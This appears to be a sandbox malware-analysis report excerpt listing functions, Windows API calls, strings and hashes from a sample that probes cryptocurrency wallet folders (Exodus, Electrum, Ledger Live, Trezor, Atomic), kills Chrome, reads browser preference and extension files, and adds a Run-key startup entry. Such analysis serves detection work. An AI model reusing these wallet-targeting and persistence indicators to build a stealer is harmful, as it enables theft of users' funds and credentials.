String ID: Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor$exists$status
API String ID: 3930398341-644159398
Opcode ID: bcadf20640420031074605f38039830a50cdc84bb0a0e0709c0706a48c0f022b
Instruction ID: b3a01631c52773731b9346765e21c3eb2535ab2558e61e7bd941347a8b8f8d33
Opcode Fuzzy Hash: bcadf20640420031074605f38039830a50cdc84bb0a0e0709c0706a48c0f022b
Instruction Fuzzy Hash: BA51C532B06B419AE710EF69E4806ADB7A5F748798F818235EE5D57BB8DF38D241C700

Function 00007FF7ABC3E440 Relevance: 27.2, APIs: 18, Instructions: 229
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesExW.KERNEL32 ref: 00007FF7ABC3E4ED
GetLastError.KERNEL32 ref: 00007FF7ABC3E4F7
FindFirstFileW.KERNEL32 ref: 00007FF7ABC3E50E
GetLastError.KERNEL32 ref: 00007FF7ABC3E51A
FindClose.KERNEL32 ref: 00007FF7ABC3E528
__std_fs_open_handle.LIBCPMT ref: 00007FF7ABC3E5BB
CloseHandle.KERNEL32 ref: 00007FF7ABC3E5D1
CloseHandle.KERNEL32 ref: 00007FF7ABC3E744

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
String ID:
API String ID: 2398595512-0
Opcode ID: 6858acbf963c982cb1cd254155e3c2789ca4be43a97c9a17c07e5e84bf3bcdfe
Instruction ID: d5195372c85be7408e2637ab8eca88f653481a14f1f20ce674cf8786c436105a
Opcode Fuzzy Hash: 6858acbf963c982cb1cd254155e3c2789ca4be43a97c9a17c07e5e84bf3bcdfe
Instruction Fuzzy Hash: 3B919831B0AA0346EA786B2DA414A79E290AF857B0FD54734D97E476F4DF3CE4498730

Function 00007FF7ABC05D60 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 265
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7ABC05DA2
Process32FirstW.KERNEL32 ref: 00007FF7ABC05E30
OpenProcess.KERNEL32 ref: 00007FF7ABC05F2A
TerminateProcess.KERNEL32 ref: 00007FF7ABC05FB5
CloseHandle.KERNEL32 ref: 00007FF7ABC05FC8
Process32NextW.KERNEL32 ref: 00007FF7ABC05FD6
CloseHandle.KERNEL32 ref: 00007FF7ABC05FE7
Sleep.KERNEL32 ref: 00007FF7ABC06086
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC06180

Strings

Failed to create process snapshot., xrefs: 00007FF7ABC05DB4
chrome.exe, xrefs: 00007FF7ABC05E40
Terminating Chrome process with PID , xrefs: 00007FF7ABC05E4D
No Chrome instances found or failed to close., xrefs: 00007FF7ABC06140
All Chrome instances closed., xrefs: 00007FF7ABC060C1

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotTerminateToolhelp32_invalid_parameter_noinfo_noreturn
String ID: All Chrome instances closed.$Failed to create process snapshot.$No Chrome instances found or failed to close.$Terminating Chrome process with PID $chrome.exe
API String ID: 2017165370-1079413332
Opcode ID: 51d06e4672338ef495216ec558f695adddee4ec15272c40506ae06f82aa901c2
Instruction ID: 1f9d8f7adf673c947a6eec24fab4b793d6dbc30bf56e64b12940725608ca467d
Opcode Fuzzy Hash: 51d06e4672338ef495216ec558f695adddee4ec15272c40506ae06f82aa901c2
Instruction Fuzzy Hash: 75B1F971B1A64182EE10EB29E44467AA3A1FF857F4F914331EAAD077F9DE3CE5818710

Function 00007FF7ABC09030 Relevance: 15.2, Strings: 12, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C:\Users\%s\AppData\Local\Programs\atomic, xrefs: 00007FF7ABC091B0
C:\Program Files\Trezor Suite, xrefs: 00007FF7ABC09268
Trezor, xrefs: 00007FF7ABC0922F, 00007FF7ABC0929A
C:\Program Files (x86)\Electrum, xrefs: 00007FF7ABC09338
C:\Program Files\Ledger Live, xrefs: 00007FF7ABC092D0
Atomic, xrefs: 00007FF7ABC091D6
C:\ProgramData\%s\exodus, xrefs: 00007FF7ABC09110
C:\Users\%s\AppData\Local\exodus, xrefs: 00007FF7ABC09160
Electrum, xrefs: 00007FF7ABC0936A
Exodus, xrefs: 00007FF7ABC09136, 00007FF7ABC09186
Ledger Live, xrefs: 00007FF7ABC092FF
C:\Users\%s\AppData\Local\Programs\Trezor Suite, xrefs: 00007FF7ABC09203

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Concurrency::cancel_current_taskEnumUser_invalid_parameter_noinfo_noreturn
String ID: Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor
API String ID: 2880872648-867269125
Opcode ID: 40e1d524d0cf9ac0a26d818b4100a920cecaccf8db0e889dc0ecb2a8ab87186c
Instruction ID: 43a9c714de37f8f4c16c2bab5c9d1bb0ebe3305d0388b3260bbe4fccc52ecfd3
Opcode Fuzzy Hash: 40e1d524d0cf9ac0a26d818b4100a920cecaccf8db0e889dc0ecb2a8ab87186c
Instruction Fuzzy Hash: 32A1B232915BC685E720DF34DC50BE97360FB99348FA19326EA8C26935EF78A2D4C740

Function 00007FF7ABC5D2C8 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 335
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF7ABC5D30D

Part of subcall function 00007FF7ABC5C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5C9E4

Part of subcall function 00007FF7ABC58340: RtlFreeHeap.NTDLL(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58356
Part of subcall function 00007FF7ABC58340: GetLastError.KERNEL32(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58360

Part of subcall function 00007FF7ABC4CD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7ABC4CD0F,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC4CD69
Part of subcall function 00007FF7ABC4CD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7ABC4CD0F,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC4CD8E

Part of subcall function 00007FF7ABC6695C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC668A7

_get_daylight.LIBCMT ref: 00007FF7ABC5D2FC

Part of subcall function 00007FF7ABC5CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5CA44

_get_daylight.LIBCMT ref: 00007FF7ABC5D572
_get_daylight.LIBCMT ref: 00007FF7ABC5D583
_get_daylight.LIBCMT ref: 00007FF7ABC5D594
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ABC5D7D4), ref: 00007FF7ABC5D5BB

Strings

Eastern Standard Time, xrefs: 00007FF7ABC5D661
Eastern Summer Time, xrefs: 00007FF7ABC5D679

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: f6ffeae5673c8de371c0e9f3875728c18a8d6f78cbc9436f7dd89e17034f8244
Instruction ID: 017e0f9597edf185fe46cfbb7183af39125f26042c460b4c8f2bdef57bcb550f
Opcode Fuzzy Hash: f6ffeae5673c8de371c0e9f3875728c18a8d6f78cbc9436f7dd89e17034f8244
Instruction Fuzzy Hash: DBD1D322A0A34246E720BF29D890EB9E761FF84794FC24235EA5D476B5EF3CE451C760

Function 00007FF7ABC5E170 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7ABC5DD54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5DD95
Part of subcall function 00007FF7ABC5DD54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5DE13
Part of subcall function 00007FF7ABC5DD54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5DE64

CreateFileW.KERNEL32 ref: 00007FF7ABC5E276
CreateFileW.KERNEL32 ref: 00007FF7ABC5E2C6
GetLastError.KERNEL32 ref: 00007FF7ABC5E2F6
GetFileType.KERNEL32 ref: 00007FF7ABC5E30B
GetLastError.KERNEL32 ref: 00007FF7ABC5E315
CloseHandle.KERNEL32 ref: 00007FF7ABC5E348
CloseHandle.KERNEL32 ref: 00007FF7ABC5E4AB
CreateFileW.KERNEL32 ref: 00007FF7ABC5E4E0
GetLastError.KERNEL32 ref: 00007FF7ABC5E4EF

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
Instruction ID: 075cd666fe1483c7c9345c29fbda3375c168cc698743f065058b8390a8a74103
Opcode Fuzzy Hash: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
Instruction Fuzzy Hash: 8DC1B132B29A4286EB10DFA8C490ABC7761F749B98F821335DA1E973B5CF38E455C710

Function 00007FF7ABC5D544 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7ABC5D572

Part of subcall function 00007FF7ABC5CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5CA44

_get_daylight.LIBCMT ref: 00007FF7ABC5D583

Part of subcall function 00007FF7ABC5C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5C9E4

_get_daylight.LIBCMT ref: 00007FF7ABC5D594

Part of subcall function 00007FF7ABC5CA00: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5CA14

Part of subcall function 00007FF7ABC58340: RtlFreeHeap.NTDLL(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58356
Part of subcall function 00007FF7ABC58340: GetLastError.KERNEL32(?,?,?,00007FF7ABC62B26,?,?,?,00007FF7ABC62EA3,?,?,00000000,00007FF7ABC633AD,?,?,?,00007FF7ABC632DF), ref: 00007FF7ABC58360

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ABC5D7D4), ref: 00007FF7ABC5D5BB

Strings

Eastern Standard Time, xrefs: 00007FF7ABC5D661
Eastern Summer Time, xrefs: 00007FF7ABC5D679

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
Instruction ID: 523952505cbb518bf5bccdd1ed2087d854e25f315c7e45a82b8a6588f43877e6
Opcode Fuzzy Hash: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
Instruction Fuzzy Hash: 1D519232A1A74246F710FF69D890DB9E760BB88784F825235EA5D436B5DF3CE4508760

Function 00007FF7ABC0A691 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 310fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE ref: 00007FF7ABC0A6EE
FindClose.KERNEL32 ref: 00007FF7ABC0A71B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A76D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A773
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A77F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A785
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC0A78B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7C5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7DC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7EE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC0A7FC
__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0A883

Strings

exists, xrefs: 00007FF7ABC0A7A4
directory_iterator::directory_iterator, xrefs: 00007FF7ABC0A7B8
1, xrefs: 00007FF7ABC0A8AD
directory_entry::status, xrefs: 00007FF7ABC0A7CF

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Find$CloseConcurrency::cancel_current_taskFileNext__std_fs_code_page
String ID: 1$directory_entry::status$directory_iterator::directory_iterator$exists
API String ID: 1745604696-621175605
Opcode ID: dd98db87b711232d25a555fb221cb94b33c07972d3ba08ca9b8986b961203a82
Instruction ID: 5124024807cf3544381d9b72ec4e54b899fffc8fcdccf3e1dfeb2e8150cb4c33
Opcode Fuzzy Hash: dd98db87b711232d25a555fb221cb94b33c07972d3ba08ca9b8986b961203a82
Instruction Fuzzy Hash: D5D19662E1A7C241EA20AB18E444B7EE361FB85B94F915631EAAD036F5DF7CE580C710

Function 00007FF7ABC10D05 Relevance: 19.7, APIs: 2, Strings: 9, Instructions: 451COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0EF46

Part of subcall function 00007FF7ABC3E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7ABC03F96), ref: 00007FF7ABC3E0C6

Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03B25
Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03BCA

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC0F01E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10E1D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10E29
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10E2F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10E52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10E6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10ECA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10ED0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10ED6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10F6C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FD0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FD6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FDC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC10FE2

Strings

profile, xrefs: 00007FF7ABC0F322, 00007FF7ABC0F33F, 00007FF7ABC0F35D, 00007FF7ABC0F384
\Preferences, xrefs: 00007FF7ABC10D21
\Secure Preferences, xrefs: 00007FF7ABC10D1A
File parse failed, xrefs: 00007FF7ABC0F2FF
developer_mode, xrefs: 00007FF7ABC0F661, 00007FF7ABC0F697
name, xrefs: 00007FF7ABC0F371, 00007FF7ABC0F398
extensions, xrefs: 00007FF7ABC0F5DC, 00007FF7ABC0F5F9, 00007FF7ABC0F617, 00007FF7ABC0F63E, 00007FF7ABC0F674, 00007FF7ABC0F6C6, 00007FF7ABC0F6E3, 00007FF7ABC0F701
\Extensions, xrefs: 00007FF7ABC0EDD0
pinned_extensions, xrefs: 00007FF7ABC0F718, 00007FF7ABC0F72F, 00007FF7ABC0F755

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page__std_fs_convert_narrow_to_wide$ApisFile
String ID: File parse failed$\Extensions$\Preferences$\Secure Preferences$developer_mode$extensions$name$pinned_extensions$profile
API String ID: 2697701713-219585183
Opcode ID: 67d35dfa7e85170c17c098ed7cd5c7520f7156fe35288b4de8b711d8b04b2b30
Instruction ID: 0f0ad74f4ac8883f872e749ba3d627260db7ce3da76e33c7607706ae0280deb5
Opcode Fuzzy Hash: 67d35dfa7e85170c17c098ed7cd5c7520f7156fe35288b4de8b711d8b04b2b30
Instruction Fuzzy Hash: 19328062A1ABC281EA34EB18E4947EAE365FBC0744FC14136D68D476B9EF7CD584CB10

Function 00007FF7ABC13A10 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 169
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF7ABC13A5A
RegSetValueExA.KERNEL32 ref: 00007FF7ABC13B35
RegCloseKey.ADVAPI32 ref: 00007FF7ABC13B43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC13CC7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC13CCD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC13CD3

Strings

Error opening registry key: , xrefs: 00007FF7ABC13A6B
' to startup., xrefs: 00007FF7ABC13BA1
Error adding startup program: , xrefs: 00007FF7ABC13C50
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF7ABC13A4C
Successfully added ', xrefs: 00007FF7ABC13B89

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseOpenValue
String ID: ' to startup.$Error adding startup program: $Error opening registry key: $Software\Microsoft\Windows\CurrentVersion\Run$Successfully added '
API String ID: 31251203-1688488963
Opcode ID: 83d51618ce504506530fd22f02fb6bdbd732b92acf62a78b58852be582b103ea
Instruction ID: 254b87df625ef14edc10caab09ecddaf32fc7a78e70c39642bc62805afd6c871
Opcode Fuzzy Hash: 83d51618ce504506530fd22f02fb6bdbd732b92acf62a78b58852be582b103ea
Instruction Fuzzy Hash: FA719572B1AB4152EA10AB68E454B69A351FBC57F4F914331E6BD13AF9DF3CE4808710

Function 00007FF7ABC17970 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcesses.KERNEL32(FFFFFFFF), ref: 00007FF7ABC179A3
OpenProcess.KERNEL32 ref: 00007FF7ABC17A1C
K32EnumProcessModules.KERNEL32 ref: 00007FF7ABC17A7D
K32GetModuleBaseNameW.KERNEL32 ref: 00007FF7ABC17A9D
TerminateProcess.KERNEL32 ref: 00007FF7ABC17B09
CloseHandle.KERNEL32 ref: 00007FF7ABC17BA2

Strings

Failed to enumerate processes, xrefs: 00007FF7ABC179AD
Failed to terminate process: , xrefs: 00007FF7ABC17B80
Successfully terminated process: , xrefs: 00007FF7ABC17B22

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Process$Enum$BaseCloseHandleModuleModulesNameOpenProcessesTerminate
String ID: Failed to enumerate processes$Failed to terminate process: $Successfully terminated process:
API String ID: 3307072288-2317428871
Opcode ID: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
Instruction ID: 10ca4bb10a0af8ad7bacb9366e729109516871c0d36b7e701a203cd11a3768b5
Opcode Fuzzy Hash: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
Instruction Fuzzy Hash: C251B4B1A0E68281EA60BB19F440AFAA361FFC47D0F815131D98D536B9EF3CE185C710

Function 00007FF7ABC3E7C8 Relevance: 16.7, APIs: 11, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_fs_open_handle.LIBCPMT ref: 00007FF7ABC3E808

Part of subcall function 00007FF7ABC3E770: CreateFileW.KERNEL32 ref: 00007FF7ABC3E7A3
Part of subcall function 00007FF7ABC3E770: GetLastError.KERNEL32 ref: 00007FF7ABC3E7B2

SetFileInformationByHandle.KERNEL32 ref: 00007FF7ABC3E832
__std_fs_open_handle.LIBCPMT ref: 00007FF7ABC3E86A
CloseHandle.KERNEL32 ref: 00007FF7ABC3E884
GetLastError.KERNEL32 ref: 00007FF7ABC3E8B8
GetFileInformationByHandleEx.KERNEL32 ref: 00007FF7ABC3E904
GetLastError.KERNEL32 ref: 00007FF7ABC3E912
CloseHandle.KERNEL32 ref: 00007FF7ABC3E928
SetFileInformationByHandle.KERNEL32 ref: 00007FF7ABC3E954
SetFileInformationByHandle.KERNEL32 ref: 00007FF7ABC3E988
GetLastError.KERNEL32 ref: 00007FF7ABC3E9AA

Part of subcall function 00007FF7ABC51774: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7ABC48A1A,?,?,?,00007FF7ABC4CC32), ref: 00007FF7ABC5179A

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

